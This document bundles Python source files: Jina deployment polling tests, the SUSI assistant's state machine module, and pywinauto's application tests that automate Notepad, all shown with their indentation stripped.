def index(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@requests(on='/search')
def search(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@pytest.mark.parametrize('polling', ['any', 'all'])
def test_dynamic_polling_default_config(polling):
args = set_deployment_parser().parse_args(
[
'--uses',
'DynamicPollingExecutorDefaultNames',
'--shards',
str(2),
'--polling',
polling,
]
)
pod = Deployment(args)
with pod:
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/search'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/search',
)
assert len(response.docs) == 1 + 2
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/index'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/index',
)
assert len(response.docs) == 1 + 1
@pytest.mark.parametrize('polling', ['any', 'all'])
def test_dynamic_polling_overwrite_default_config(polling):
endpoint_polling = {'/search': PollingType.ANY, '*': polling}
args = set_deployment_parser().parse_args(
[
'--uses',
'DynamicPollingExecutorDefaultNames',
'--shards',
str(2),
'--polling',
json.dumps(endpoint_polling),
]
)
pod = Deployment(args)
with pod:
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/search'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/search',
)
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/index'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/index',
)
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
def _create_test_data_message(endpoint='/'):
return list(request_generator(endpoint, DocumentArray([Document(text='client')])))[
0
]
@pytest.mark.parametrize('num_shards, num_replicas', [(1, 1), (1, 2), (2, 1), (3, 2)])
def test_pod_remote_pod_replicas_host(num_shards, num_replicas):
args = set_deployment_parser().parse_args(
[
'--shards',
str(num_shards),
'--replicas',
str(num_replicas),
'--host',
__default_host__,
]
)
assert args.host == __default_host__
with Deployment(args) as pod:
assert pod.num_pods == num_shards * num_replicas + 1
pod_args = dict(pod.pod_args['pods'])
for k, replica_args in pod_args.items():
assert len(replica_args) == num_replicas
for replica_arg in replica_args:
assert replica_arg.host == __default_host__
|
susi_state_machine.py
|
"""This module declares the SUSI State Machine Class and Component Class.
The SUSI State Machine works on the concept of Finite State Machine.
"""
import time
import logging
from threading import Thread
from urllib.parse import urljoin
import requests
import json_config
from speech_recognition import Recognizer, Microphone
from requests.exceptions import ConnectionError
import susi_python as susi
from .busy_state import BusyState
from .error_state import ErrorState
from .idle_state import IdleState
from .recognizing_state import RecognizingState
from ..scheduler import ActionScheduler
logger = logging.getLogger(__name__)
class Components:
"""Common components accessible by each state of the the SUSI state Machine.
"""
def __init__(self, renderer=None):
try:
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
except ImportError:
logger.warning("This device doesn't have GPIO port")
except RuntimeError as e:
logger.error(e)
pass
thread1 = Thread(target=self.server_checker, name="Thread1")
thread1.daemon = True
thread1.start()
recognizer = Recognizer()
recognizer.dynamic_energy_threshold = False
recognizer.energy_threshold = 1000
self.recognizer = recognizer
self.microphone = Microphone()
self.susi = susi
self.renderer = renderer
self.server_url = "https://127.0.0.1:4000"
self.action_schduler = ActionScheduler()
self.action_schduler.start()
try:
res = requests.get('http://ip-api.com/json').json()
self.susi.update_location(
longitude=res['lon'], latitude=res['lat'],
country_name=res['country'], country_code=res['countryCode'])
except ConnectionError as e:
logger.error(e)
self.config = json_config.connect('config.json')
if self.config['usage_mode'] == 'authenticated':
try:
susi.sign_in(email=self.config['login_credentials']['email'],
password=self.config['login_credentials']['password'])
except Exception as e:
logger.error('Some error occurred during login. Check your login details in config.json.\n%s', e)
if self.config['hotword_engine'] == 'Snowboy':
from ..hotword_engine.snowboy_detector import SnowboyDetector
self.hotword_detector = SnowboyDetector()
else:
from ..hotword_engine.sphinx_detector import PocketSphinxDetector
self.hotword_detector = PocketSphinxDetector()
if self.config['WakeButton'] == 'enabled':
logger.info("Susi has the wake button enabled")
if self.config['Device'] == 'RaspberryPi':
logger.info("Susi runs on a RaspberryPi")
from ..hardware_components import RaspberryPiWakeButton
self.wake_button = RaspberryPiWakeButton()
else:
logger.warning("Susi is not running on a RaspberryPi")
self.wake_button = None
else:
logger.warning("Susi has the wake button disabled")
self.wake_button = None
def server_checker(self):
response_one = None
test_params = {
'q': 'Hello',
'timezoneOffset': int(time.timezone / 60)
}
while response_one is None:
try:
logger.debug("checking for local server")
url = urljoin(self.server_url, '/susi/chat.json')
response_one = requests.get(url, params=test_params)  # plain requests returns a Response directly; there is no .result()
api_endpoint = self.server_url
susi.use_api_endpoint(api_endpoint)
except AttributeError:
time.sleep(10)
continue
except ConnectionError:
time.sleep(10)
continue
class SusiStateMachine(Thread):
"""SUSI State Machine works on the concept of Finite State Machine. Each step of working of this app is divided into
a state of the State Machine. Each state can transition into one of the allowed states and pass some information
to other states as PAYLOAD. Upon Error, transition should happen to Error State and after speaking the correct error
message, the machine transitions to the Idle State.
"""
def __init__(self, renderer=None):
super().__init__()
components = Components(renderer)
self.__idle_state = IdleState(components)
self.__recognizing_state = RecognizingState(components)
self.__busy_state = BusyState(components)
self.__error_state = ErrorState(components)
self.current_state = self.__idle_state
self.__idle_state.allowedStateTransitions = \
{'recognizing': self.__recognizing_state, 'error': self.__error_state, 'busy': self.__busy_state}
self.__recognizing_state.allowedStateTransitions = \
{'busy': self.__busy_state, 'error': self.__error_state}
self.__busy_state.allowedStateTransitions = \
{'idle': self.__idle_state, 'error': self.__error_state, 'recognizing': self.__recognizing_state}
self.__error_state.allowedStateTransitions = \
{'idle': self.__idle_state}
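# resulting transition graph:
#   idle        -> recognizing | busy | error
#   recognizing -> busy | error
#   busy        -> idle | recognizing | error
#   error       -> idle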
def run(self):
self.current_state.on_enter(payload=None)
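# Minimal usage sketch (an assumption about how this class is driven elsewhere, not
# something defined in this module): SusiStateMachine is a Thread, so a caller would
# typically do something like
#
#     machine = SusiStateMachine(renderer=None)
#     machine.start()   # run() enters the idle state, which then drives the transitions above
#
# The renderer argument and the surrounding application wiring are hypothetical here.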
|
test_application.py
|
# GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#pylint: disable-msg=C0301
#pylint: disable-msg=F0401
#pylint: disable-msg=W0142
"""Tests for application.py"""
import sys
import os
import unittest
import time
#import pprint
#import pdb
import warnings
from threading import Thread
import ctypes
import mock
sys.path.append(".")
from pywinauto import Desktop
from pywinauto import win32defines
from pywinauto import application
from pywinauto.controls import hwndwrapper
from pywinauto.application import Application
from pywinauto.application import WindowSpecification
from pywinauto.application import process_module
from pywinauto.application import process_get_modules
from pywinauto.application import ProcessNotFoundError
from pywinauto.application import AppStartError
from pywinauto.application import AppNotConnected
from pywinauto import findwindows
from pywinauto import findbestmatch
from pywinauto.timings import Timings
from pywinauto.timings import TimeoutError
from pywinauto.timings import WaitUntil
from pywinauto.timings import always_wait_until
from pywinauto.timings import always_wait_until_passes
from pywinauto.timings import timestamp # noqa: E402
from pywinauto.sysinfo import is_x64_Python
from pywinauto.sysinfo import is_x64_OS
from pywinauto.sysinfo import UIA_support
#application.set_timing(1, .01, 1, .01, .05, 0, 0, .1, 0, .01)
# About dialog may take some time to load
# so make sure that we wait for it.
Timings.window_find_timeout = 5
def _notepad_exe():
if is_x64_Python() or not is_x64_OS():
return r"C:\Windows\System32\notepad.exe"
else:
return r"C:\Windows\SysWOW64\notepad.exe"
mfc_samples_folder_32 = mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
class ApplicationWarningTestCases(unittest.TestCase):
"""Unit tests for warnings in the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
# Force Display User and Deprecation warnings every time
# Python 3.3+nose/unittest trys really hard to suppress them
for warning in (UserWarning, PendingDeprecationWarning):
warnings.simplefilter('always', warning)
mfc_samples_folder = os.path.join(os.path.dirname(__file__),
r"..\..\apps\MFC_samples")
if is_x64_Python():
self.sample_exe = os.path.join(mfc_samples_folder,
"x64",
"CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder,
"CmnCtrl1.exe")
else:
self.sample_exe = os.path.join(mfc_samples_folder, "CmnCtrl1.exe")
self.sample_exe_inverted_bitness = os.path.join(mfc_samples_folder,
"x64",
"CmnCtrl1.exe")
def testStartWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
app = Application().start(self.sample_exe_inverted_bitness)
app.kill()
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "64-bit" in str(w[-1].message)
def testConnectWarning3264(self):
if not is_x64_OS():
self.defaultTestResult()
return
app = Application().start(self.sample_exe_inverted_bitness)
# AppVeyor mysteries...
self.assertEqual(app.is_process_running(), True)
with mock.patch("warnings.warn") as mockWarn:
Application().connect(process=app.process)
app.kill()
args, kw = mockWarn.call_args
assert len(args) == 2
assert "64-bit" in args[0]
assert args[1].__name__ == 'UserWarning'
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
class AdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(AdminTestCases, self).setUp()
cmd = 'powershell -Command "Start-Process {} -Verb RunAs"'.format(self.sample_exe)
self.app = Application().start(cmd, wait_for_idle=False)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(AdminTestCases, self).tearDown()
def test_non_admin_warning(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(title="Common Controls Sample", timeout=20)
assert len(w) >= 1
assert issubclass(w[-1].category, UserWarning)
assert "process has no rights" in str(w[-1].message)
def test_non_admin_click(self):
self.app = Application().connect(title="Common Controls Sample", timeout=20)
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.OK.click_input()
with self.assertRaises(RuntimeError):
self.app.CommonControlsSample.TVS_HASBUTTON.check()
class NonAdminTestCases(ApplicationWarningTestCases):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
super(NonAdminTestCases, self).setUp()
self.app = Application().start(self.sample_exe)
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
super(NonAdminTestCases, self).tearDown()
def test_both_non_admin(self):
warnings.filterwarnings('always', category=UserWarning, append=True)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.app = Application().connect(title="Common Controls Sample", timeout=5)
assert len(w) == 0
def test_both_non_admin_click(self):
self.app = Application().connect(title="Common Controls Sample", timeout=5)
self.app.CommonControlsSample.TVS_HASBUTTON.check()
self.assertEqual(self.app.CommonControlsSample.TVS_HASBUTTON.is_checked(), True)
self.app.CommonControlsSample.OK.click()
self.app.CommonControlsSample.wait_not('visible')
class ApplicationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.prev_warn = warnings.showwarning
def no_warnings(*args, **kwargs): pass
warnings.showwarning = no_warnings
if is_x64_Python() or not is_x64_OS():
self.notepad_subpath = r"system32\notepad.exe"
else:
self.notepad_subpath = r"SysWOW64\notepad.exe"
def tearDown(self):
"""Close the application after tests"""
#self.dlg.SendMessage(win32defines.WM_CLOSE)
warnings.showwarning = self.prev_warn
def test__init__(self):
"""Verify that Application instance is initialized or not"""
self.assertRaises(ValueError, Application, backend='unregistered')
def test_not_connected(self):
"""Verify that it raises when the app is not connected"""
self.assertRaises (AppNotConnected, Application().__getattribute__, 'Hiya')
self.assertRaises (AppNotConnected, Application().__getitem__, 'Hiya')
self.assertRaises (AppNotConnected, Application().window_, title = 'Hiya')
self.assertRaises (AppNotConnected, Application().top_window_,)
def test_start_problem(self):
"""Verify start_ raises on unknown command"""
self.assertRaises (AppStartError, Application().start, 'Hiya')
def test_start(self):
"""test start() works correctly"""
app = Application()
self.assertEqual(app.process, None)
app.start(_notepad_exe())
self.assertNotEqual(app.process, None)
self.assertEqual(app.UntitledNotepad.process_id(), app.process)
notepadpath = os.path.join(os.environ['systemroot'], self.notepad_subpath)
self.assertEqual(str(process_module(app.process)).lower(), str(notepadpath).lower())
app.UntitledNotepad.MenuSelect("File->Exit")
def testStart_bug01(self):
"""On SourceForge forum AppStartError forgot to include %s for application name"""
app = Application()
self.assertEqual(app.process, None)
application.app_start_timeout = 1
app_name = r"I am not * and Application!/\.exe"
try:
app.start(app_name)
except AppStartError as e:
self.assertEquals(app_name in str(e), True)
# def testset_timing(self):
# """Test that set_timing sets the timing correctly"""
# prev_timing = (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# )
# set_timing(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
#
# self.assertEquals(
# (
# application.window_find_timeout,
# application.window_retry_interval,
# application.app_start_timeout,
# application.exists_timeout,
# application.exists_retry_interval,
# hwndwrapper.delay_after_click,
# hwndwrapper.delay_after_menuselect,
# hwndwrapper.delay_after_sendkeys_key,
# hwndwrapper.delay_after_button_click,
# hwndwrapper.delay_before_after_close_click,
# ), (1, 2, 3, 4, 5, 6, 7, 8, 9, 10) )
#
# set_timing(*prev_timing)
def test_connect_path(self):
"""Test that connect_() works with a path"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(path=self.notepad_subpath)
self.assertEqual(app1.process, app_conn.process)
app_conn = Application()
if is_x64_Python() or not is_x64_OS():
app_conn.connect(path=r"c:\windows\system32\notepad.exe")
else:
app_conn.connect(path=r"c:\windows\syswow64\notepad.exe")
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEquals('notepad.exe' in accessible_process_names, True)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_path_timeout(self):
"""Test that connect_() works with a path with timeout"""
app1 = Application()
def delayed_launch():
time.sleep(2)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
app_conn = Application()
app_conn.connect(path=_notepad_exe(), timeout=3)
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEquals('notepad.exe' in accessible_process_names, True)
app1.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_path_timeout_problem(self):
"""Test that connect_() raise error when no process start"""
app1 = Application()
def delayed_launch():
time.sleep(1)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
self.assertRaises(ProcessNotFoundError, Application().connect, path=_notepad_exe(), timeout=0.5)
time.sleep(0.7)
app1.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_process_timeout_failed(self):
"""Test that connect_(process=...) raise error when set timeout"""
app1 = Application()
app1.start(_notepad_exe())
self.assertRaises(ProcessNotFoundError, Application().connect, process=0, timeout=0.5)
app1.UntitledNotepad.MenuSelect('File->Exit')
# def test_Connect(self):
# """Test that connect_() works with a path"""
# app1 = Application()
# app1.start_("notepad.exe")
#
# app_conn = Application()
# app_conn.connect_(path = r"system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn = Application()
# app_conn.connect_(path = r"c:\windows\system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_process(self):
"""Test that connect_() works with a process"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(process=app1.process)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_handle(self):
"""Test that connect_() works with a handle"""
app1 = Application()
app1.start(_notepad_exe())
handle = app1.UntitledNotepad.handle
app_conn = Application()
app_conn.connect(handle=handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_windowspec(self):
"""Test that connect_() works with a windowspec"""
app1 = Application()
app1.start(_notepad_exe())
#unused var: handle = app1.UntitledNotepad.handle
app_conn = Application()
try:
app_conn.connect(title = "Untitled - Notepad")
except findwindows.WindowAmbiguousError:
wins = findwindows.find_elements(active_only = True, title = "Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
except findwindows.ElementNotFoundError:
WaitUntil(30, 0.5, lambda: len(findwindows.find_elements(active_only = True, title = "Untitled - Notepad")) > 0)
wins = findwindows.find_elements(active_only = True, title = "Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_raises(self):
"""Test that connect_() raises with invalid input"""
# try an argument that does not exist
self.assertRaises (
TypeError,
Application().connect, **{'not_arg': 23})
self.assertRaises (
RuntimeError,
Application().connect)
# try to pass an invalid process
self.assertRaises (
ProcessNotFoundError,
Application().connect, **{'process': 0})
# try to pass an invalid handle
self.assertRaises(
RuntimeError,
Application().connect, **{'handle' : 0})
# try to pass an invalid path
self.assertRaises(
ProcessNotFoundError,
Application().connect, **{'path': "no app here", 'timeout': 0.0})
def test_top_window(self):
"""Test that top_window_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.top_window_)
app.start(_notepad_exe())
self.assertEqual(app.UntitledNotepad.handle, app.top_window_().handle)
app.UntitledNotepad.MenuSelect("Help->About Notepad")
self.assertEqual(app.AboutNotepad.handle, app.top_window_().handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
app.UntitledNotepad.WaitNot('exists')
self.assertRaises(RuntimeError, app.top_window_)
def test_active_window(self):
"""Test that active_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.active_)
self.assertRaises(AppNotConnected, app.is64bit)
app.start(_notepad_exe())
app.UntitledNotepad.Wait('ready')
self.assertEqual(app.active_().handle, app.UntitledNotepad.handle)
app.UntitledNotepad.MenuSelect("File->Exit")
app.UntitledNotepad.WaitNot('exists')
self.assertRaises(RuntimeError, app.active_)
def test_cpu_usage(self):
"""Verify that cpu_usage() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.cpu_usage)
app.start(_notepad_exe())
self.assertEquals(0.0 <= app.cpu_usage() <= 100.0, True)
app.UntitledNotepad.MenuSelect("File->Exit")
app.UntitledNotepad.WaitNot('exists')
def test_wait_cpu_usage_lower(self):
"""Test that wait_cpu_usage_lower() works correctly"""
if is_x64_Python() != is_x64_OS():
return None
Application().Start(r'explorer.exe')
def _cabinetwclass_exist():
"Verify if at least one active 'CabinetWClass' window is created"
l = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')
return (len(l) > 0)
WaitUntil(40, 0.5, _cabinetwclass_exist)
handle = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')[-1].handle
window = WindowSpecification({'handle': handle, 'backend': 'win32', })
explorer = Application().Connect(process = window.process_id())
try:
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
window.AddressBandRoot.ClickInput()
window.TypeKeys(r'Control Panel\Programs\Programs and Features', with_spaces=True, set_foreground=True)
window.TypeKeys(r'{ENTER}', set_foreground = False)
WaitUntil(40, 0.5, lambda: len(findwindows.find_elements(active_only = True,
title = 'Programs and Features',
class_name='CabinetWClass')) > 0)
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
installed_programs = window.FolderView.texts()[1:]
programs_list = ','.join(installed_programs)
if ('Microsoft' not in programs_list) and ('Python' not in programs_list):
hwndwrapper.ImageGrab.grab().save(r'explorer_screenshot.jpg')
hwndwrapper.ActionLogger().log('\ninstalled_programs:\n')
for prog in installed_programs:
hwndwrapper.ActionLogger().log(prog)
self.assertEqual(('Microsoft' in programs_list) or ('Python' in programs_list), True)
finally:
window.Close(2.0)
if UIA_support:
def test_wait_cpu_usage_lower_uia(self):
"""Test that wait_cpu_usage_lower() works correctly for UIA"""
app = Application(backend='uia')
app.start('notepad.exe')
try:
app.wait_cpu_usage_lower(threshold = 1.5, timeout = 30, usage_interval = 2)
finally:
app.kill()
app.cpu_usage = mock.Mock(return_value=10)
self.assertRaises(
RuntimeError, app.wait_cpu_usage_lower,
threshold = 9.0, timeout = 5, usage_interval = 0.5
)
# def test_wait_for_idle_exception(self):
# """Test that method start() raises an exception when wait for idle failed"""
# app = Application()
# self.assertRaises(Exception, app.start, 'cmd.exe')
# # TODO: test and fix the case when cmd.exe can't be killed by app.kill()
def test_windows(self):
"""Test that windows_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.windows_, **{'title' : 'not connected'})
app.start('notepad.exe')
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
notepad_handle = app.UntitledNotepad.handle
self.assertEquals(app.windows_(visible_only = True), [notepad_handle])
app.UntitledNotepad.MenuSelect("Help->About Notepad")
aboutnotepad_handle = app.AboutNotepad.handle
self.assertEquals(
app.windows_(visible_only = True, enabled_only = False),
[aboutnotepad_handle, notepad_handle])
app.AboutNotepad.OK.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
def test_window(self):
"""Test that window_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.window_, **{'title' : 'not connected'})
app.start(_notepad_exe())
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
title = app.window_(title = "Untitled - Notepad")
title_re = app.window_(title_re = "Untitled[ -]+Notepad")
classname = app.window_(class_name = "Notepad")
classname_re = app.window_(class_name_re = "Not..ad")
handle = app.window_(handle = title.handle)
bestmatch = app.window_(best_match = "Untiotled Notepad")
self.assertNotEqual(title.handle, None)
self.assertNotEqual(title.handle, 0)
self.assertEqual(title.handle, title_re.handle)
self.assertEqual(title.handle, classname.handle)
self.assertEqual(title.handle, classname_re.handle)
self.assertEqual(title.handle, handle.handle)
self.assertEqual(title.handle, bestmatch.handle)
app.UntitledNotepad.MenuSelect("File->Exit")
def test_getitem(self):
"""Test that __getitem__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(Exception, app['blahblah'])
self.assertRaises(
findbestmatch.MatchError,
app['blahblah']['not here'].__getitem__, 'handle')
self.assertEqual(
app[u'Unt\xeftledNotepad'].handle,
app.window_(title = "Untitled - Notepad").handle)
app.UntitledNotepad.MenuSelect("Help->About Notepad")
self.assertEqual(
app['AboutNotepad'].handle,
app.window_(title = "About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
def test_getattribute(self):
"""Test that __getattribute__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(
findbestmatch.MatchError,
app.blahblah.__getattribute__, 'handle')
self.assertEqual(
app.UntitledNotepad.handle,
app.window_(title = "Untitled - Notepad").handle)
app.UntitledNotepad.MenuSelect("Help->About Notepad")
# I think it's OK that this no longer raises a matcherror
# just because the window is not enabled - doesn't mean you
# should not be able to access it at all!
#self.assertRaises(findbestmatch.MatchError,
# app.Notepad.__getattribute__, 'handle')
self.assertEqual(
app.AboutNotepad.handle,
app.window(title = "About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
def test_kill_(self):
"""test killing the application"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.Edit.type_keys("hello")
app.UntitledNotepad.MenuSelect("File->Print...")
#app.Print.FindPrinter.Click() # Vasily: (Win7 x64) "Find Printer" dialog is from splwow64.exe process
#app.FindPrinters.Stop.Click()
app.kill_()
self.assertRaises(AttributeError, app.UntitledNotepad.Edit)
def test_process_is_running(self):
"""Tests process is running and wait for exit function"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.wait("ready")
self.assertTrue(app.is_process_running())
self.assertRaises(TimeoutError, lambda: app.wait_for_process_exit(timeout=5, retry_interval=1))
app.kill()
app.wait_for_process_exit()
self.assertFalse(app.is_process_running())
def test_should_return_not_running_if_not_started(self):
"""Tests that works on new instance
is_process_running/wait_for_process_exit can be called on not started/disconnected instance
"""
app = Application()
app.wait_for_process_exit(timeout=10, retry_interval=1)
self.assertFalse(app.is_process_running())
class TestInheritedApp(Application):
"""Our inherited version of class"""
def test_method(self):
"""This method should be called without any issues"""
return self is not None
def test_application_inheritance(self):
"""Test that Application class can be inherited and has it's own methods"""
app = ApplicationTestCases.TestInheritedApp()
self.assertTrue(app.test_method())
class WindowSpecificationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application().start("Notepad")
self.dlgspec = self.app.UntitledNotepad
self.ctrlspec = self.app.UntitledNotepad.Edit
def tearDown(self):
"""Close the application after tests"""
# close the application
#self.app.UntitledNotepad.MenuSelect("File->Exit")
self.app.kill_()
def test__init__(self):
"""Test creating a new spec by hand"""
wspec = WindowSpecification(
dict(
best_match = u"UntitledNotepad",
process = self.app.process)
)
self.assertEquals(
wspec.window_text(),
u"Untitled - Notepad")
def test__call__(self):
"""Test that __call__() correctly raises an error"""
self.assertRaises(AttributeError, self.dlgspec)
self.assertRaises(AttributeError, self.ctrlspec)
# no best_match!
wspec = WindowSpecification(
dict(title = u"blah", process = self.app.process) )
self.assertRaises(AttributeError, wspec)
def test_wrapper_object(self):
"""Test that we can get a control"""
self.assertEquals(True, isinstance(self.dlgspec, WindowSpecification))
self.assertEquals(
True,
isinstance(self.dlgspec.WrapperObject(), hwndwrapper.HwndWrapper)
)
def test_window(self):
"""test specifying a sub window of an existing specification"""
sub_spec = self.dlgspec.ChildWindow(class_name = "Edit")
sub_spec_legacy = self.dlgspec.Window_(class_name = "Edit")
self.assertEquals(True, isinstance(sub_spec, WindowSpecification))
self.assertEquals(sub_spec.class_name(), "Edit")
self.assertEquals(sub_spec_legacy.class_name(), "Edit")
def test__getitem__(self):
"""test item access of a windowspec"""
self.assertEquals(
True,
isinstance(self.dlgspec['Edit'], WindowSpecification)
)
self.assertEquals(self.dlgspec['Edit'].class_name(), "Edit")
self.assertRaises(AttributeError, self.ctrlspec.__getitem__, 'edit')
def test_getattr(self):
"""Test getting attributes works correctly"""
self.assertEquals(
True,
isinstance(self.dlgspec.Edit, WindowSpecification)
)
self.assertEquals(self.dlgspec.Edit.class_name(), "Edit")
# check that getting a dialog attribute works correctly
self.assertEquals(
"Notepad",
self.dlgspec.class_name())
# Check handling 'parent' as a WindowSpecification
spec = self.ctrlspec.child_window(parent=self.dlgspec)
self.assertEqual(spec.class_name(), "Edit")
def test_exists(self):
"""Check that windows exist"""
self.assertEquals(True, self.dlgspec.Exists())
self.assertEquals(True, self.dlgspec.Exists(0))
self.assertEquals(True, self.ctrlspec.Exists())
# TODO: test a control that is not visible but exists
#self.assertEquals(True, self.app.DefaultIME.Exists())
start = timestamp()
self.assertEquals(False, self.app.BlahBlah.Exists(timeout=.1))
self.assertEquals(True, timestamp() - start < .3)
start = timestamp()
self.assertEquals(False, self.app.BlahBlah.exists(timeout=3))
self.assertEquals(True, 2.7 < timestamp() - start < 3.3)
def test_exists_timing(self):
"""test the timing of the exists method"""
# try ones that should be found immediately
start = timestamp()
self.assertEquals(True, self.dlgspec.Exists())
self.assertEquals(True, timestamp() - start < .3)
start = timestamp()
self.assertEquals(True, self.ctrlspec.Exists())
self.assertEquals(True, timestamp() - start < .3)
# try one that should not be found
start = timestamp()
self.assertEquals(True, self.dlgspec.Exists(.5))
timedif = timestamp() - start
